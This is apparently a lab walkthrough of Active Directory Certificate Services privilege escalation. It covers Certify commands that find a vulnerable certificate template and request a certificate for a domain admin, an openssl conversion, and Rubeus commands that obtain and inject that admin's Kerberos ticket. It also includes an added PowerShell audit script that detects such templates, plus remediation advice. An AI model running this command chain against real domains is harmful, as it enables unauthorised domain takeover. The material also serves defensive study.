Privilege Escalation by using Vulnerable Certificate Template

Active Directory Certificate Services (AD CS) is a Windows Server role that provides customizable services for creating and managing Public Key Infrastructure (PKI) certificates, which can be used for encrypting and digitally signing electronic documents, emails, messages and so on.

Here is the pathway: any domain user abuses a misconfigured certificate template in Certificate Services to generate a valid certificate for a domain admin user. The user then requests a TGT by using the generated certificate and finally imports the domain admin user’s TGT into the machine. Pwned!

As always, we have a domain user without any special permissions. It is just a member of Domain Users and, as expected, the user cannot access C$ on the Domain Controller.

We can enumerate the servers on which Certificate Services is installed by using the Certify tool like below:

Certify.exe cas

The ACMEDC.ACME.LOCAL host looks like a certificate authority.

Let’s check whether it has any vulnerable template:

Certify.exe find /vulnerable

Perfect! There is a vulnerable certificate template named TEST-WEBSERVER.

  • ENROLLEE_SUPPLIES_SUBJECT means that any user who is allowed to enroll in a certificate with this setting can request a certificate as any user in the network, including a privileged user.
  • pkiextendedkeyusage and mspki-certificate-application-policy include Client Authentication.
  • Enrollment Rights include the NT AUTHORITY\Users group. It means any authenticated user can be issued a certificate.
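As an added audit script (not part of the original post and not Certify’s code), the following PowerShell walks the template objects in the Configuration partition and flags those that show the same combination described in the bullets above: the enrollee supplies the subject, an authentication-capable EKU, and enrollment rights granted to broad groups. It goes slightly beyond the post by also requiring that no manager approval and no authorized signatures are configured, since either would block such a request; it assumes the ActiveDirectory module and read access to the Configuration naming context.

```powershell
# Added audit script (not from the original post). Assumes the ActiveDirectory module
# and read access to the Configuration naming context.
Import-Module ActiveDirectory

$configDN    = (Get-ADRootDSE).configurationNamingContext
$templatesDN = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configDN"

# Flag bits and OIDs from the certificate template schema
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag: manager approval
$AuthEkus = @('1.3.6.1.5.5.7.3.2',        # Client Authentication
              '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
              '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
              '2.5.29.37.0')              # Any Purpose
$EnrollGuids = @('0e10c968-78fb-11d2-90d4-00c04f79dc55',   # Certificate-Enrollment
                 'a05b8cc2-17bc-4802-a710-e7c15ab866a2',   # Certificate-AutoEnrollment
                 '00000000-0000-0000-0000-000000000000')   # all extended rights
$BroadSids = @('S-1-1-0', 'S-1-5-11')   # Everyone, Authenticated Users
$BroadRids = @('513', '515')            # Domain Users, Domain Computers

function Test-BroadPrincipal($identity) {
    try { $sid = $identity.Translate([System.Security.Principal.SecurityIdentifier]).Value }
    catch { return $false }
    return ($BroadSids -contains $sid) -or ($BroadRids -contains ($sid -split '-')[-1])
}

$props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature',
         'pKIExtendedKeyUsage', 'msPKI-Certificate-Application-Policy', 'nTSecurityDescriptor'
Get-ADObject -SearchBase $templatesDN -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props |
ForEach-Object {
    $t = $_
    $supplies = ($t.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $approval = ($t.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
    $sigs     = [int]($t.'msPKI-RA-Signature')
    # An empty EKU list means "any purpose"; otherwise look for an authentication-capable OID
    $ekus    = @(@($t.pKIExtendedKeyUsage) + @($t.'msPKI-Certificate-Application-Policy') | Where-Object { $_ })
    $authEku = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $AuthEkus -contains $_ }).Count -gt 0)
    # Enrollment (or GenericAll) granted to a broad principal
    $extRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $allRight = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $broadEnroll = @($t.nTSecurityDescriptor.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ( ($_.ActiveDirectoryRights.HasFlag($extRight) -and $EnrollGuids -contains $_.ObjectType.ToString()) -or
          $_.ActiveDirectoryRights.HasFlag($allRight) ) -and
        (Test-BroadPrincipal $_.IdentityReference)
    })
    if ($supplies -and $authEku -and -not $approval -and $sigs -eq 0 -and $broadEnroll.Count -gt 0) {
        [pscustomobject]@{ Template = $t.Name; EnrollableBy = ($broadEnroll.IdentityReference -join ', ') }
    }
}
```

Any template it reports should have ENROLLEE_SUPPLIES_SUBJECT cleared or its enrollment permissions narrowed, and the CA’s issued-certificate log reviewed for requests made against it.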

So we can request a certificate for a member of Domain Admins.

First of all, let’s generate the certificate for zeus:

Certify.exe request /ca:ACMEDC.acme.local\acme-ACMEDC-CA-1 /template:TEST-WEBSERVER /altname:zeus

[*] cert.pem         :

Save the output as cert.pem and then convert it to PFX format by using the openssl command:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Then base64-encode cert.pfx for use in the Ticket Granting Ticket (TGT) request:

cat cert.pfx | base64 -w 0

The final step is to request a TGT by using this base64-encoded certificate and then import the ticket:

C:\bin\Rubeus.exe asktgt /user:zeus /certificate:MIIMbwIBAzCCDDUGCSqGByPcK/zZw0OjCIln5Fz3 --snip-- +KvcECJ04lN89sU7mAgIIAA== /password:password

C:\bin\Rubeus.exe ptt /ticket:doIF3jCCBdqgAwIBB --snip-- Y21lLmxvY2Fs

Ta-da! We have Domain Admin permissions. Let’s access the Domain Controller’s C$, create a user and add it to the Domain Admins group.

I AM THE AUTHORITY !

Cheers !
